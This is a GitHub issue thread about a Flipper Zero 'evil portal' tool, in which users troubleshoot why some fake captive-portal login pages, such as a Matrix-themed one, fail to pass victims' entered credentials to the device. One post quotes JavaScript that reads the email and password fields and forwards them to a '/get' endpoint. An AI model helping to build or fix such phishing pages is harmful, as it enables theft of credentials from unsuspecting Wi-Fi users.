bigbrodude6119/flipper-zero-evil-portal #51: multiple portals do not forward inputs to flipper

rawesomeawesome, 2023-07-27:
Very fun tool, but looking at the html I can't decipher the difference between working index.html portals (google modern and better google mobile) and ones like matrix.html that drop credentials instead of piping them to the flipper... is there a specific template for forwarding html text box inputs to the flipper zero?

rawesomeawesome, 2023-07-27:
Testing everything I can try moving code around in these lil html files... it seems like the matrix code rain can't run if I add the script lines from spirit airlines to successfully pipe the credentials, but I can't understand what the difference is or why spirit airlines needs scripting when the google pages pipe just fine with empty script regions

rawesomeawesome, 2023-07-27:
I don't see how the form.elements piping lines: `const email = form.elements['email'].value;
const password = form.elements['password'].value;
window.location.href = '/get?email=' + email + '&password=' + password;`
Causes the matrix rain code: ` terminal.innerText = '> ';
            var message = messages.shift();
            typeMessage(message, 0);
            form.style.display = 'none';

            // Start matrix rain
            var spans = matrix.querySelectorAll('span');
            for (let i = 0; i < spans.length; i++) {
                spans[i].style.animationPlayState = 'running';
            }
        }

        // Matrix rain
        var characters = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
        for (let i = 0; i < 100; i++) {
            let span = document.createElement('span');
            span.innerText = characters[Math.floor(Math.random() * characters.length)];
            span.style.left = Math.random() * window.innerWidth + 'px';
            span.style.animationDelay = Math.random() + 's';
            matrix.appendChild(span);
        }`
not to run

amouly, 2023-07-27:
> Very fun tool, but looking at the html I can't decipher the difference between working index.html portals (google modern and better google mobile) and ones like matrix.html that drop credentials [...]

I don't understand what you are trying to do, can you explain with more details?

rawesomeawesome, 2023-07-27:
> I don't understand what you are trying to do, can you explain with more details?

The listed function of the Evil Portal is to send anything a user enters in the login page to be logged on the flipper, many of the provided portal index.html pages do not properly send these inputs to the flipper

rawesomeawesome, 2023-07-30:
https://github.com/rawesomeawesome/flipper-zero-evil-portal/blob/main/portals/Matrix.html 
My HTML wizard sister wrote up a solution for the matrix page, however I'm too much of a noob to implement something to get numbers submitting for the prank game page

rawesomeawesome, 2023-07-30:
It does require that you wait for the fake hacking to complete before the form is submitted, which is almost a security feature, in that a savvy user could exit their browser or reload the page and the flipper would never get their credentials

nayko79, 2023-08-22:
Ya probé todo pero no logro que aparezca el html al conectarse al AP y lo devuelva al flipper, ya no se que más probar